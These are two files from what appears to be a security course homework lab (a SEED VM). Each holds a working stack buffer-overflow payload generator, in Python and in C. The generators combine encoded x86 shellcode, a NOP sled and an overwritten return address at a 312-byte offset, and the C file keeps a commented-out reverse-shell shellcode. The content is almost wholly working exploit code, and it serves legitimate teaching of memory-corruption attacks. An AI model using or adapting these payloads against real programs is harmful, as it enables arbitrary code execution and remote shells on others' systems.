File: hw1/gen_payload.py
shellcode = ("\xbd\x2d\x05\x63\x7b\xd9\xc2\xd9\x74\x24\xf4\x5f\x33\xc9"
      "\xb1\x0b\x83\xc7\x04\x31\x6f\x11\x03\x6f\x11\xe2\xd8\x6f"
      "\x68\x23\xbb\x22\x08\xbb\x96\xa1\x5d\xdc\x80\x0a\x2d\x4b"
      "\x50\x3d\xfe\xe9\x39\xd3\x89\x0d\xeb\xc3\x82\xd1\x0b\x14"
      "\xbc\xb3\x62\x7a\xed\x5f\x07\x82\xa6\xcc\x6e\x63\x85\x73").encode('latin-1')

buffer_size = 312  # The exact offset found using pattern_offset
shellcode_size = len(shellcode)
nops = 200
ebp_addr = 0xffffd528  # Use the EBP value you found earlier
addr = ebp_addr + 80
print(f"[+] Return Address: {hex(addr)}")

content = bytearray(0x90 for _ in range(buffer_size))  # NOP sled until the offset
ret_address = addr.to_bytes(4, byteorder='little')
content += ret_address
content += b"\x90" * nops  # Add NOPs
content += shellcode

print(f"[+] Shellcode length: {len(shellcode)}")
print(f"[+] Payload length: {len(content)}")

with open('real_payload', 'wb') as f:
    f.write(content)

File: hw1/gen_payload.c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

// from the online definition of little endian conversion
uint32_t to_little_endian32(uint32_t value) {
  return ((value & 0xFF) << 24) | ((value & 0xFF00) << 8) |
         ((value >> 8) & 0xFF00) | ((value >> 24) & 0xFF);
}

int main() {
  // reverse shell payload
  /*
  unsigned char buf[] =
      "\xbb\x10\x6f\x60\xac\xdd\xc3\xd9\x74\x24\xf4\x5a\x33\xc9"
      "\xb1\x12\x31\x5a\x12\x03\x5a\x12\x83\xd2\x6b\x82\x59\xe3"
      "\xa8\xb5\x41\x50\x0c\x69\xec\x54\x1b\x6c\x40\x3e\xd6\xef"
      "\x32\xe7\x58\xd0\xf9\x97\xd0\x56\xfb\xff\xe8\xb8\x9c\x5d"
      "\x84\xba\x62\xb0\x09\x32\x83\x02\xd7\x14\x15\x31\xab\x96"
      "\x1c\x54\x06\x18\x4c\xfe\xf7\x36\x02\x96\x6f\x66\xcb\x04"
      "\x19\xf1\xf0\x9a\x8a\x88\x16\xaa\x26\x46\x58";
  */
  unsigned char buf[] = {
      0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, 0xc9, 0xb0,
      0x04, 0xb3, 0x01, 0x59, 0xb2, 0x16, 0xcd, 0x80, 0x31, 0xc0, 0xb0,
      0x01, 0x31, 0xdb, 0xcd, 0x80, 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x54,
      0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x61, 0x77, 0x65, 0x73,
      0x6f, 0x6d, 0x65, 0x20, 0x73, 0x61, 0x75, 0x63, 0x65, 0x0a};

  int buffer_size = 312;               // pattern_offset result
  uint32_t ebp_addr = 0xffffd528;      // ebp from seed vm
  int shellcode_len = sizeof(buf) - 1; // no null byte
  int nops = 200;

  printf("Shellcode Length [+]: %d\n", shellcode_len);

  uint32_t addr = ebp_addr + 80;
  printf("Return address [+]: %x\n", addr);

  unsigned char *content =
      malloc(buffer_size + sizeof(addr) + nops + shellcode_len);

  // load nops to buffer
  for (int i = 0; i < buffer_size; i++) {
    content[i] = 0x90;
  }

  uint32_t li_addr = to_little_endian32(addr);
  memcpy(&(content[buffer_size]), &addr, sizeof(uint32_t));
  printf("Return address little endian [+]: %x\n", li_addr);

  // load nopsled to shellcode
  for (int i = 0; i < nops; i++) {
    content[i + buffer_size + sizeof(uint32_t)] = 0x90;
  }

  // load shellcode
  for (int i = 0; i < shellcode_len; i++) {
    content[i + buffer_size + sizeof(uint32_t) + nops] = buf[i];
  }

  FILE *file = fopen("payload", "w");
  if (file == NULL) {
    perror("Error openning file");
    return 1;
  }
  int n = write(fileno(file), content,
                buffer_size + sizeof(addr) + nops + shellcode_len);
  printf("Payload written to file payload: %d\n", n);

  return 0;
}
